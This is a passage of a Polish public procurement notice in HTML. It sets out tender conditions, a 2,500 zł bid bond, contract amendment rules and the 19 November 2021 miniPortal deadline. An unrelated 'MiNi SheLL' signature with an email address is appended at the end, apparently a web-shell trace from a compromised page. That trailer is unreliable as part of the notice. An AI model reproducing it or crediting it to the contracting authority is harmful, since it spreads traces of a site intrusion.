pełnomocnictwa lub inny dokument potwierdzający umocowanie do<br/> <br/>reprezentowania wykonawcy (jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów o których mowa w pkt. 2 ).<br/>4)	Zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy zgodnie z Załącznikiem nr 5 do SWZ oraz oświadczenia , o których mowa w Rozdziale XI SWZ (wraz z dokumentami, zgodnie z katalogiem dokumentów określonych w Rozdziale X SWZ. jeżeli dotyczy);<br/>5)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy- zgodnie z Załącznikiem nr 6 do SWZ oraz oświadczenia , o których mowa w Rozdziale XII SWZ (jeżeli dotyczy);<br/>6)	dowód wniesienia wadium (w przypadku wadium złożonego w formie poręczeń lub gwarancji); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 2500,00 zł (słownie: dwa tysiące pięćset złotych 00/100); <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/><br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pomocą środków komunikacji elektronicznej przy użyciu systemu miniPortal: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-19 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1)	Realizacja dostaw objętych gwarantowaną częścią zamówienia – do 40 dni od dnia zawarcia umowy<br/>2)	Deklaracja Zamawiającego do skorzystania z prawa opcji - do 27 grudnia 2021 roku,<br/>3)	Realizacja dostaw objętych prawem opcji – do 14 dni od złożenia oświadczenia o skorzystaniu z prawa opcji

Creat By MiNi SheLL
Email: jattceo@gmail.com